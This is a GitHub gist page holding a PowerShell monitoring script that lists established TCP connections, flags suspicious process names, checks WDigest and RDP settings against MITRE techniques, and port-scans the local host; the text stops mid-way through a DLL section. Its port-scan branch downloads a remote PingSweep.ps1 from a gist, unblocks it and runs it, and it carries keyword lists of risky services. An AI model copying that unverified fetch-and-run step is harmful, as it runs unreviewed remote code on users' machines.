Skip to content

Instantly share code, notes, and snippets.

@r00t-3xp10it

r00t-3xp10it/ScanTCP.ps1

Last active October 18, 2025 00:29
Show Gist options
  • Save r00t-3xp10it/586346116ddbeeeaad4e9775b123d549 to your computer and use it in GitHub Desktop.
Save r00t-3xp10it/586346116ddbeeeaad4e9775b123d549 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
ScanTCP.ps1
<#
.SYNOPSIS
List Established TCP connections [For() loop]
Author: @r00t-3xp10it
Tested Under: Windows 11 (26100) x64 bits
Required Dependencies: Get-NetTCPConnection
Optional Dependencies: Netstat, ipinfo.io
PS cmdlet Dev version: v2.2.7
.DESCRIPTION
List ESTABLISHED TCP connections in loop mode by
invoking Netstat or Get-NetTCPConnection commands,
report\flush Dns resolver cache, Lhost GeoLocation
and scans for possible MITRE ATT&CK vulnerabilitys
.NOTES
Executing -invoke 'netstat' together with -process switch
display the ProcessName associated with the TCP connection
and alert user of suspicious TCP connections [yellow color]
Or possible dangererous service names using the [red color]
Executing -invoke 'netstat' -process -warnmeof 'svchost'
pops up one ballontip warning everytime one TCP connection
related with the process svchost is found active on device
Invoking -filter '127.0.0.1' will delete from scan reports
all '127.0.0.1' strings found and full comrrespondent line.
How to use more than one filter? -filter 'svchost|127.0.0.1'
Parameter -ScanType 'manual' requires the user to press any
key on is keyboard for next scan (bypass -ScanEach '<secs>')
'-DLL','-DNS','-GEOLOCATION','-MITRE','-PORTSCAN' are standalone
parameters that can not be executed together with other parameters
.Parameter Invoke
List TCP connections invoking (Netstat|NetTCPConnection)
.Parameter ScanType
The type of scan [loop] to use (automatic|manual)
.Parameter ScanEach
Scan for TCP connections each 6 seconds (3|15)
.Parameter MaxScans
The max number of TCP scans to perform (1|80)
.Parameter Filter
Delete from scan reports all strings (0.0.0.0:)
.Parameter LogFile
Switch that appends scans to TCPreport_19_27_50_2025.txt
.Parameter Process
Switch to retrive process name associated with TCP connection
.Parameter WarnMeOf
Pops up ballontip warning that process name was found active
.Parameter ProcessInfo
Switch that displays TCP connection process name detail info
.Parameter Dns
Switch that retrieves Lhost DNS resolver cache entrys[ipv4|ipv6]
.Parameter DLL
Switch to Search for DLLs loaded by running processes
.Parameter PortScan
Switch that Searchs for TCP high risk [open] ports
.Parameter GeoLocation
Switch that retrieves Lhost geolocation with http://ipinfo.io
.Parameter Mitre
Switch that searchs for possible MITRE ATT&CK vulnerabilitys
.EXAMPLE
PS C:\> .\ScanTCP.ps1
List TCP connections using default settings
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat
List TCP connections invoking netstat
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -Process
List TCP connections invoking NetTCPConnection, display processname
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat -Process
List TCP connections invoking netstat, display processname
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke netstat -Process -warnmeof 'svchost'
pops up one ballontip warning everytime one TCP connection
related with the process svchost is found active on device
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -LogFile
List TCP connections invoking NetTCPConnection and append scan results to logfile
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke Netstat -MaxScans 6 -ScanEach 2 -filter '127.0.0.1'
List TCP connections invoking Netstat command, scan 6 times max with 2 seconds delay
and delete from scan reports all strings with '127.0.0.1' characters [full line]
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -Invoke NetTCPConnection -MaxScans 3 -ScanType manual
List TCP connections invoking NetTCPConnection, scan 3 times, (press keyboard key for new scan)
.EXAMPLE
PS C:\> .\ScanTCP.ps1 -invoke 'Netstat' -process -warnmeof 'SVCHOST' -scaneach '10' -maxscans '80'
Execute netstat command to scan for TCP active connections, displays process names associated with
the TCP connection, triggers BallonTip warnings if SVCHOST process if found active, waits 10 seconds
before realizing the next TCP connection scan, repeats all steps described before a max of 80 times
.INPUTS
None. You cannot pipe objects into ScanTCP.ps1
.OUTPUTS
(
* ) ( )\ )
) /( )\ (()/( )
( )(_))(((_) /(_)) ( ( ( /( (
(_(_()) )\___ (_)) )\ )\ )(_)) )\ )
|_ _|((/ __|| _ \ ((_) ((_)((_)_ _(_/(
| | | (__ | _/ (_-</ _| / _ || ' \))
|_| \___||_| /__/\__| \__,_||_||_|
List ESTABLISHED 192.168.1.5 TCP Connections
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
TCP State LocalAddress LocalPort RemoteAddress RemotePort HostName ProcessName OwningProcess
--------- ------------ --------- ------------- ---------- -------- ----------- -------------
Established 192.168.1.5 62082 140.82.113.26 443 lb-140-82-113-26-iad.github.com opera 776
Established 127.0.0.1 60919 127.0.0.1 58995 Skynet AcerGAICameraW 6880
Established 127.0.0.1 60904 127.0.0.1 5141 Skynet AQAUserPS 3404
Established 127.0.0.1 58995 127.0.0.1 60919 Skynet AcerPixyService 4548
Established 127.0.0.1 49673 127.0.0.1 49672 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49672 127.0.0.1 49673 Skynet AcerSysMonitorService 8560
Established 127.0.0.1 49670 127.0.0.1 49669 Skynet ADESv2Svc 4508
Established 127.0.0.1 49669 127.0.0.1 49670 Skynet ADESv2Svc 4508
Established 192.168.1.5 49412 4.207.247.139 443 svchost 4964
Established 127.0.0.1 5141 127.0.0.1 60904 Skynet AcerQAAgent 4576
-|Scan[7:20]|-
.LINK
https://github.com/r00t-3xp10it/redpill
https://github.com/r00t-3xp10it/meterpeter
#>
[CmdletBinding(PositionalBinding=$false)] param(
[string]$Invoke="NetTCPConnection",
[string]$ScanType="automatic",
[string]$Filter="0.0.0.0:",
[string]$WarnMeOf="NULL",
[switch]$ProcessInfo,
[switch]$GeoLocation,
[int]$MaxScans="10",
[int]$ScanEach="6",
[switch]$PortScan,
[switch]$Process,
[switch]$Logfile,
[switch]$Mitre,
[switch]$DLL,
[switch]$Dns
)
$StartBanner = @"
(
* ) ( )\ )
` ) /( )\ (()/( )
( )(_))(((_) /(_)) ( ( ( /( (
(_(_()) )\___ (_)) )\ )\ )(_)) )\ )
|_ _|((/ __|| _ \ ((_) ((_)((_)_ _(_/(
| | | (__ | _/ (_-</ _| / _` || ' \))
|_| \___||_| /__/\__| \__,_||_||_|
"@;
$CmdletVersion = "v2.2.7"
# Script local Variable declarations
$IsClientAdmin = [bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -Match "S-1-5-32-544")
$LogName = "TCPreport_" + "$(Get-Date -Format 'HH_mm_ss_yyyy')" + ".txt" -join ''
$host.UI.RawUI.WindowTitle = "@ScanTCP > [ $CmdletVersion ]"
$IP = ((ipconfig|findstr [0-9].\.)[0]).Split()[-1]
$ErrorActionPreference = "SilentlyContinue"
$WarnMeOf = $WarnMeOf.ToUpper()
$Backuup = $MaxScans
# Lack of Administrator privileges remark
If(($IsClientAdmin -Match "^(False)$") -and ($ProcessInfo.IsPresent))
{
powershell (New-Object -ComObjEct Wscript.Shell).Popup("Some tasks require admin privilegess`nto extract info from services\processes",7,"ScanTCP - $CmdletVersion - ADMIN PRIVILEGES REMARK",0+64)|Out-Null
}
# make sure the correct scan mode is sellected
If($Invoke -iNotMatch "^(netstat|NetTCPConnection)$")
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Wrong " -NoNewline
Write-Host "-invoke '$Invoke'" -ForegroundColor Red -NoNewline
Write-Host " input, defaulting to " -NoNewline
Write-Host "NetTCPConnection" -ForegroundColor Green
$Invoke = "NetTCPConnection"
}
# make sure the correct Loop mode is sellected
If($ScanType -iNotMatch "^(automatic|manual)$")
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] wrong " -NoNewline
Write-Host "-scantype '$scantype'" -ForegroundColor Red -NoNewline
Write-Host " input, defaulting to " -NoNewline
Write-Host "automatic" -ForegroundColor Green -NoNewline
Write-Host " scans"
$ScanType = "Automatic"
}
## MIn|Max number of scans permited
If($MaxScans -lt 1 -or $MaxScans -gt 80)
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Non Optimal " -NoNewline
Write-Host "-maxscans '$MaxScans'" -ForegroundColor Red -NoNewline
Write-Host " Setting detected. Defaulting to " -NoNewline
Write-Host "10" -ForegroundColor Green -NoNewline
Write-Host " scans?"
Write-Host "[" -NoNewline
Write-Host "?" -ForegroundColor Yellow -NoNewline
$BypassMax = Read-Host "] Use default setting recomended? (yes|no)"
If($BypassMax -iMatch "^(y|yes)$")
{
$Backuup = $MaxScans = "10"
}
}
# Make sure the correct timming is set
If($ScanEach -lt 3 -or $ScanEach -gt 15)
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] Non optimal " -NoNewline
Write-Host "-scaneach '$ScanEach'" -ForegroundColor Red -NoNewline
If($ScanEach -gt 15)
{
$ScanEach = "15"
}
ElseIf(($ScanEach -lt 3) -and ($WarnMeOf -iNotMatch "^(NULL)$"))
{
$ScanEach = "4"
}
ElseIf($ScanEach -lt 3)
{
$ScanEach = "3"
}
Write-Host " Setting, defaulting to " -NoNewline
Write-Host "$ScanEach" -ForegroundColor Green -NoNewline
Write-Host " seconds"
}
# modules load incompatiblity warnings
If(($GeoLocation.IsPresent) -and ($Logfile.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "logfile" -ForegroundColor Red -NoNewline
Write-Host " creation its not available in " -NoNewline
Write-Host "-geolocation" -ForegroundColor Red -NoNewline
Write-Host " module"
}
If(($Mitre.IsPresent) -and ($Logfile.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "logfile" -ForegroundColor Red -NoNewline
Write-Host " creation its not available in " -NoNewline
Write-Host "-mitre" -ForegroundColor Red -NoNewline
Write-Host " module"
}
If(-not($Process.IsPresent) -and ($WarnMeOf -iNotMatch "^(NULL)$"))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "-warnmeof '$WarnMeOf'" -ForegroundColor Red -NoNewline
Write-Host " requires " -NoNewline
Write-Host "-process" -ForegroundColor Red -NoNewline
Write-Host " parameters invoked together"
}
If(-not($Process.IsPresent) -and ($ProcessInfo.IsPresent))
{
Write-Host "[" -NoNewline
Write-Host "ERROR" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "-ProcessInfo" -ForegroundColor Red -NoNewline
Write-Host " requires " -NoNewline
Write-Host "-process" -ForegroundColor Red -NoNewline
Write-Host " parameters invoked together"
}
function Invoke-BallonTip()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - pops up one ballontip warning
.NOTES
pops up one ballontip in the end of each scan
#>
Add-Type -AssemblyName System.Windows.Forms
$balmsg = New-Object System.Windows.Forms.NotifyIcon
$path = (Get-Process -id $pid).Path
$balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($path)
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Info
$balmsg.BalloonTipText = "Scans finished - $(Get-Date -Format g)"
$balmsg.BalloonTipTitle = "ScanTCP - $CmdletVersion - $CmdLetAppl"
$balmsg.Visible = $true
$balmsg.ShowBalloonTip(10000)
}
function Invoke-BallonTipWarnings()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - pops up one ballontip warning [Netstat|NetTCPConnection]
.NOTES
pops up one ballontip warning that one TCP connection
related with process name was found active on device
#>
$SuspiciousDB = @(
"$WarnMeOf","NETBIOS","TELNET","LDAPS","IMAPS","MSTSC","LSASS","RDP","SMB","SSH","SSL","VNC","SYSTEM"
)
[int]$Contador='0'
ForEach($NameToken in $SuspiciousDB)
{
If($ProcName -iMatch "$NameToken") ## [Netstat|NetTCPConnection]$ProcessName = $SuspiciousDB(item) ?
{
$pathId = (Get-Process -id $pid).Path
# SuspiciousDB(item) found -> BallonTip
Add-Type -AssemblyName System.Windows.Forms
$balmsg = New-Object System.Windows.Forms.NotifyIcon
$balmsg.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($pathId)
If($NameToken -iMatch "SVCHOST") ## Scan for possible Mitre T1021 vulnerability
{
## SVCHOST process found by -WarnMeOf 'SVCHOST' --> Scanning for rdpcorets.dll load
# Note: SVCHOST process by default was not inserted into $SuspiciousDB() Processes list
# Test: Process_Id: 24288 DLLs: ntdll.dll [loaded by 24288] OR rdpcorets.dll [realvuln]
$PPID = ((Get-Process -Name "SVCHOST" | Select-Object * | Where-Object {
$_.Id -eq "$ProcPPID" -and $_.Responding -Match "True" -and $_.Modules.ModuleName -iMatch "rdpcorets.dll"})
).Id # <-- Get Process PID that loaded DLL
# Make sure termservice (RDP) service is running
# Test: AcerPixyService [running] OR termservice [realvuln]
$RDPservice = [bool]((Get-Service -Name "termservice" -EA SilentlyContinue).Status -ieq "Running")
# Requires rdpcorets.dll [PID] loaded by SVCHOST process
# and TermService running to be vulnerable to Mitre T1021
If(($PPID -Match '^\d+$') -and ($RDPservice -Match "^(True)$")) ## SVCHOST::Detection Rule [1]
{
# TermService [Mitre T1021] vulnerability BallonTip warning
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "DLL RDPCORETS.dll was loaded by SVCHOST PID: $PPID on Port: $LocalPor Vuln: TermService [Mitre T1021]"
$Contador++
}
}
## Detection rules of other $SuspiciousDB(items)
If($NameToken -iMatch "LSASS") ## LSASS::Detection Rule [2]
{
If((Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest').UseLogonCredential -eq 1)
{
# LSASS with stored credentials connecting to TCP [danger]
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken with stored credentials connecting to TCP on Port: $LocalPor Vuln: LSASS Leak [Mitre T1003]"
$Contador++
}
}
If(($NameToken -iMatch "RDP") -and ($LocalPor -eq 3389) -or ($LocalPor -eq 445) -or ($LocalPor -eq 5985)) ## RDP::Detection Rule [3]
{
# RDP connecting to TCP Local Ports: 3389|445|5985
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken proccess name found conecting to TCP on LocalPort: $LocalPor"
$Contador++
}
If(($NameToken -iMatch "SSH") -and ($LocalPor -eq 22)) ## SSH::Detection Rule [4]
{
If(Test-Path -Path "$Env:PROGRAMDATA\ssh\sshd_config")
{
# SSH connecting to TCP Local Port: 22 with credentials stored
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Error
$balmsg.BalloonTipText = "$NameToken proccess name found conecting to TCP on LocalPort: $LocalPor config_file_in: $Env:PROGRAMDATA\ssh\sshd_config"
$Contador++
}
}
If($Contador -eq 0)
{
## [Netstat|NetTCPConnection]$ProcessName = $SuspiciousDB(item)
$balmsg.BalloonTipIcon = [System.Windows.Forms.ToolTipIcon]::Warning
$balmsg.BalloonTipText = "$NameToken proccess name found conecting to TCP on LocalPort: $LocalPor"
}
# Execute BallonTip
$balmsg.BalloonTipTitle = "ScanTCP - $CmdletVersion - $CmdLetAppl"
$balmsg.Visible = $true
$balmsg.ShowBalloonTip(100)
# Time for BallonTip to close
Start-Sleep -Milliseconds 1800
}
}
}
function Invoke-ScheduleTasks()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Prints pending [Today:Hour] schedule tasks
.NOTES
This function only prints schedule tasks if task is
in 'Ready' state and with [todays::Hour] timestamps
.OUTPUTS
TaskName State NextRunTime Execute
-------- ----- ----------- -------
Office Actions Server Ready 14/10/2025 21:00:00 C:\Program Files\Microsoft Office\root\VFS\ProgramFilesCommonX64\Microsoft Share...
Microsoft Compatibility Appraiser Ready 14/10/2025 21:31:07 %windir%\system32\sc.exe
Data Integrity Check And Scan Ready 14/10/2025 21:35:52
QueueReporting Ready 14/10/2025 21:09:51 %windir%\system32\wermgr.exe
#>
## Print only tasks schedule with [today::hour] timestamps
$CurrentHour = (Get-Date -Format 'HH:') + "\d\d:" -join '' # Regex: 03:\d\d:
# $_.Execute -match '[^\s+*]$' <--- Do not print .Action.Execute lines that are empty
$StoreData = (Get-ScheduledTask|Select-Object TaskName,State,@{Name='NextRunTime';Expression={($_|Get-ScheduledTaskInfo).NextRunTime}},@{Name='Execute';Expression={$_.Actions.Execute}}|
Where-Object{$_.State -Match "Ready" -and $_.TaskName -iNotMatch 'OneDrive' -and $_.NextRunTime -Match $(Get-Date -Format 'dd/') -and $_.NextRunTime -Match "$CurrentHour"}|Format-Table -AutoSize
)
# None tasks with [today::hour] found
If([string]::IsNullOrEmpty($StoreData))
{
Write-Host "[" -NoNewline
Write-Host "x" -ForegroundColor Red -NoNewline
Write-Host "] ERROR: " -NoNewline
Write-Host "None tasks schedule for " -ForegroundColor Red -NoNewline
Write-Host "$(Get-Date -Format 'dd/MM/yyyy')" -ForegroundColor Blue -NoNewline
Write-Host " for the current " -ForegroundColor Red -NoNewline
Write-Host "hour" -ForegroundColor Blue -NoNewline
Write-Host " found.`n`n" -ForegroundColor Red
return
}
# Print [today::hour] schedule tasks found OnScreen
$StoreData|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "^(--------)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "C:\\Users\\$Env:USERNAME")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -Match '%\w*')
{
@{ 'ForegroundColor' = 'Gray' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
}
function Invoke-ProcessTCPwarnings()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Use NETSTAT command to list established TCP connections
.NOTES
The -invoke 'netstat' together with -process switch will
display the Process Name associated with the TCP connection
and alert user of suspicious TCP connections (yellow color)
and possible exploitable service names using the (red color)
Parameters -invoke 'netstat' -process -warnmeof 'svchost'
pops up one ballontip warning that one TCP connection
related with process svchost was found active on device
Invoking -filter '127.0.0.1' will delete from scan report
all '127.0.0.1' strings found and is comrrespondente line
.OUTPUTS
Name Status LinkSpeed ifDesc
---- ------ --------- ------
Wi-Fi Up 286.8 Mbps MediaTek Wi-Fi 6 MT7921 Wireless LAN Card
Ethernet Disconnected 0 bps Realtek PCIe GbE Family Controller
Proto State LocalAddress LocalPort RemoteAddress RemotePort ProcessName OwningProcess
----- ----- ------------ --------- ------------- ---------- ----------- -------------
TCP Established 127.0.0.1 5141 127.0.0.1 58600 AcerQAAgent 4296
TCP Established 127.0.0.1 49669 127.0.0.1 49670 ADESv2Svc 4216
TCP Established 127.0.0.1 49670 127.0.0.1 49669 ADESv2Svc 4216
TCP Established 127.0.0.1 49672 127.0.0.1 49673 AcerSysMonitorService 8120
TCP Established 127.0.0.1 49673 127.0.0.1 49672 AcerSysMonitorService 8120
TCP Established 127.0.0.1 58600 127.0.0.1 5141 AQAUserPS 24772
TCP Established 127.0.0.1 58641 127.0.0.1 58995 AcerGAICameraW 25144
TCP Established 127.0.0.1 58995 127.0.0.1 58641 AcerPixyService 16616
TCP Established 192.168.1.5 49457 4.207.247.137 443 svchost 4804
TCP Established 192.168.1.5 63677 185.199.110.133 443 opera 16944
TCP Established 192.168.1.5 63678 185.199.108.154 443 opera 16944
TCP Established 192.168.1.5 63692 140.82.113.25 443 opera 16944
TCP Established 192.168.1.5 63659 52.123.129.14 443 MpDefenderCoreService 22416
#>
$CmdLetAppl = "Netstat"
# Build connections DataTable! [filter [ 0.0.0.0: --> IPv6 addr]
$TcpList = netstat -ano|findstr "ESTABLISHED"|findstr /V "[ $Filter"
Get-NetAdapter|Select-Object Name,Status,LinkSpeed,ifDesc|
Format-Table -AutoSize|Out-String -Stream|Select-Object -skip 1
# TCP TABLE
$TCPtable = New-Object System.Data.DataTable
$TCPtable.Columns.Add("Proto")|Out-Null
$TCPtable.Columns.Add("State")|Out-Null
$TCPtable.Columns.Add("LocalAddress")|Out-Null
$TCPtable.Columns.Add("LocalPort")|Out-Null
$TCPtable.Columns.Add("RemoteAddress")|Out-Null
$TCPtable.Columns.Add("RemotePort")|Out-Null
$TCPtable.Columns.Add("ProcessName")|Out-Null
$TCPtable.Columns.Add("OwningProcess")|Out-Null
# PROCESSES INFO TABLE
$Proctable = New-Object System.Data.DataTable
$Proctable.Columns.Add("ProcessName")|Out-Null
$Proctable.Columns.Add("Description")|Out-Null
$Proctable.Columns.Add("DLLs Loaded")|Out-Null
ForEach($Item in $TcpList)
{
## Loop trougth all $TcpList Items to build Table!
# Split List using the empty spaces betuiwn strings!
$ParsingData = $Item.split()
# Delete empty lines from the variable List!
$RawData = $ParsingData|?{$_.trim() -ne ""}
$Protocol = $RawData[0] ## Protocol
$AddrPort = $RawData[1] ## LocalAddress + port
$LocalHos = $AddrPort.Split(':')[0] ## LocalAddress
$LocalPor = $AddrPort.Split(':')[1] ## LocalPort
$ProcPPID = $RawData[-1] ## Process PID
$Remoteal = $RawData[2] ## RemoteAddress + port
$Remotead = $Remoteal.Split(':')[0] ## RemoteAddress
$Remotepo = $Remoteal.Split(':')[1] ## RemotePort
$ProcName = (Get-Process -Id "$ProcPPID").ProcessName
## Adding values to output DataTable! Protocol - Established
$TCPtable.Rows.Add("$Protocol", ## Protocol
"Established", ## State
"$LocalHos", ## LocalAddress
"$LocalPor", ## LocalPort
"$Remotead", ## RemoteAddress
"$Remotepo", ## RemotePort
"$ProcName", ## ProcessName
"$ProcPPID" ## OwningProcess
)|Out-Null
# BallonTip warning function
If($WarnMeOf -iNotMatch "^(NULL)$")
{
# Trigger BallonTip warning that process name has found connecting to TCP ?
If($ProcName -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
Invoke-BallonTipWarnings
}
}
# ProcessName Information
If($ProcessInfo.IsPresent)
{
<#
.OUTPUTS
ProcessName Description DLLs Loaded
----------- ----------- -----------
opera Opera GX Internet Browser opera.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll opera_elf.dll bcryptprimitives.dll opera_bro...
AQAUserPS
AcerPixyService
AcerGAICameraW Acer GAI Camera Windows AcerGAICameraW.exe ntdll.dll KERNEL32.DLL KERNELBASE.dll USER32.dll win32u.dll WINHTTP.dll A...
AcerSysMonitorService
AcerSysMonitorService
ADESv2Svc
ADESv2Svc
svchost
AcerQAAgent
#>
$ProcNa = (Get-Process -Id $ProcPPID).Name
$ProcDe = (Get-Process -Id $ProcPPID).Description
$DLLSLoaded = (Get-Process -Id $ProcPPID|Select *).modules.modulename
## Adding values to output DataTable!
$Proctable.Rows.Add("$ProcNa", ## name
"$ProcDe", ## description
"$DLLSLoaded" ## DLLS LOADED
)|Out-Null
}
}## End of ForEach()
## Display scan results OnScreen (collorize outputs)
# This function will alarm users of suspicious connections (yellow) 20|80|107|137|445
# and most commun used malicious service names will be flaged in red
$TCPtable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match '\s+127.0.0.1\s+')
{
@{ 'ForegroundColor' = 'Gray' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# ProcessInfo TABLE output
If($ProcessInfo.IsPresent)
{
Start-Sleep -Milliseconds 1400
#echo $Proctable|Format-Table -AutoSize|Out-String -Stream|Select-Object -skip 1
$Proctable|Format-Table -AutoSize|Out-String -Stream|select -skip 1|ForEach-Object {
$stringformat = If($_ -iMatch "(ftp|TeamViewer|svchost|Csrss|backgroundTaskHost|http|spoolsv|taskhostw|PhoneExperienceHost)")
{
@{ 'ForegroundColor' = 'Yellow' }
}
ElseIf($_ -iMatch "($WarnMeOf|LDAPS|IMAPS|RDP|Mstsc|smb|netbios|Lsass|telnet|ssh|ssl|vnc|System)")
{
@{ 'ForegroundColor' = 'Red' }
}
ElseIf($_ -iMatch "(MpDefenderCoreService|MsMpEng|SecurityHealthSystray|SecurityHealthService)")
{
@{ 'ForegroundColor' = 'Green' }
}
ElseIf($_ -Match "^(-----)")
{
@{ 'ForegroundColor' = 'Blue' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
## Invoke schedule tasks
Invoke-ScheduleTasks
}
# Append to logfile ?
If($Logfile.IsPresent)
{
echo $TCPtable|Format-Table -AutoSize >> $LogName
If($ProcessInfo.IsPresent)
{
echo $Proctable|Format-Table -AutoSize >> $LogName
}
}
}
function Invoke-TCPStats()
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - TCP\IP Statistics Final Table
.OUTPUTS
IPV6 Address Name SentBytes ReceivedBytes SentUnicastBytes ReceivedUnicastBytes SentUnicastPackets
------------ ---- --------- ------------- ---------------- -------------------- ------------------
fe80::8939:e854:6bd9:2c55%8 Wi-Fi 325768937 13457281219 322241183 13452982392 1743601
fe80::8939:e854:6bd9:2c55%8 Ethernet 0 0 0 0 0
#>
echo ""
# Get IPV6 address to colorize output table later
$Interface = (Get-NetIPAddress|Where-Object PrefixOrigin -eq dhcp).InterFaceAlias
$IPv6Addre = ((Get-NetIPAddress -AddressFamily IPv6|Select-Object *)|Where-Object {$_.InterFaceAlias -Match "$Interface"}).IPAddress
Get-NetAdapterStatistics|Select-Object @{Name='IPV6 Address';Expression={"$IPv6Addre"}},Name,SentBytes,ReceivedBytes,SentUnicastBytes,ReceivedUnicastBytes,SentUnicastPackets|Format-Table -AutoSize|Out-String -Stream|ForEach-Object {
$stringformat = If($_ -iMatch "^(--------)")
{
@{ 'ForegroundColor' = 'Blue' }
}
ElseIf($_ -iMatch "::")
{
@{ 'ForegroundColor' = 'Gray' }
}
Else
{
@{ 'ForegroundColor' = 'White' }
}
Write-Host @stringformat $_
}
# Group Tag
Write-Host "-=|[" -ForegroundColor Blue -NoNewline
Write-Host "SSA" -ForegroundColor Gray -NoNewline
Write-Host "rEdTeAm" -ForegroundColor Red -NoNewline
Write-Host "@" -ForegroundColor DarkYellow -NoNewline
Write-Host "2025" -ForegroundColor Gray -NoNewline
Write-Host "]|=-" -ForegroundColor Blue
}
function Invoke-ScanTypes()
{
# Scan Type (automatic|manual)
If($ScanType -imatch "automatic")
{
Start-Sleep -Seconds $ScanEach
}
Else
{
cmd /c 'pause'
echo ""
}
}
If($PortScan.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Searchs for TCP high risk [open] ports
.NOTES
Some firewalls are config to drop ICMP [ping]
packets producing false closed ports reports.
.OUTPUTS
RemoteHost Status Proto Port ServiceName HostName
----------- ------ ----- ----- ----------- --------
192.168.1.5 Closed tcp 21 FTP Skynet.home
192.168.1.5 Closed tcp 22 SSH Skynet.home
192.168.1.5 Closed tcp 23 TELNET Skynet.home
192.168.1.5 Closed tcp 80 HTTP Skynet.home
192.168.1.5 Closed tcp 110 POP3 Skynet.home
192.168.1.5 Open tcp 135 EPMAP Skynet.home
192.168.1.5 Open tcp 139 NETBIOS Skynet.home
192.168.1.5 Closed tcp 443 HTTPS Skynet.home
192.168.1.5 Open tcp 445 SMB Skynet.home
192.168.1.5 Closed tcp 8080 APACHE Skynet.home
#>
Clear-Host
$CmdLetAppl = "TCP Port Scanner"
write-host $StartBanner -ForegroundColor DarkRed
echo "" # scantype: maxports,bullet
$MsgBoxReturnCode = powershell (New-Object -ComObjEct Wscript.Shell).Popup("Warning: Some firewalls are config to drop ICMP`n[ping] packets producing false closed ports reports",7,"ScanTCP - $CmdletVersion - $CmdLetAppl",1+48)
If($MsgBoxReturnCode -eq 2) # CANCEL button pressed in MsgBox
{
Write-Host "`n[" -NoNewline
Write-Host "`x" -ForegroundColor Red -NoNewline
Write-Host "] " -NoNewline
Write-Host "Port Scan Aborted [CANCEL] by User" -ForegroundColor Red
Invoke-TCPStats
return
}
iwr -Uri "https://gist.githubusercontent.com/r00t-3xp10it/4f462362e54e33a52634719cd5e9dac4/raw/1b0cee4ab73a74abddb39fcfd7b82edd6ddba486/PingSweep.ps1" -OutFile "PingSweep.ps1"|Unblock-File
.\PingSweep.ps1 -iprange "$IP" -scantype 'maxports'
Remove-Item -Path "PingSweep.ps1" -Force
# Invoke-BallonTip
Invoke-TCPStats
Invoke-BallonTip
return
}
If($DLL.IsPresent)
{
<#
.SYNOPSIS
Author: @r00t-3xp10it
Helper - Search for DLLs loaded by running processes
.NOTES
This fuction will not scan processes not running
.OUTPUTS
Name : AMDRSSrcExt
Id : 26276
StartTime : 13/10/2025 17:22:42
Description : Radeon Settings: Source Extension
Path : C:\Program Files\AMD\CNext\CNext\AMDRSSrcExt.exe
Modules : {ntdll.dll, KERNEL32.DLL, KERNELBASE.dll, USER32.dll...}
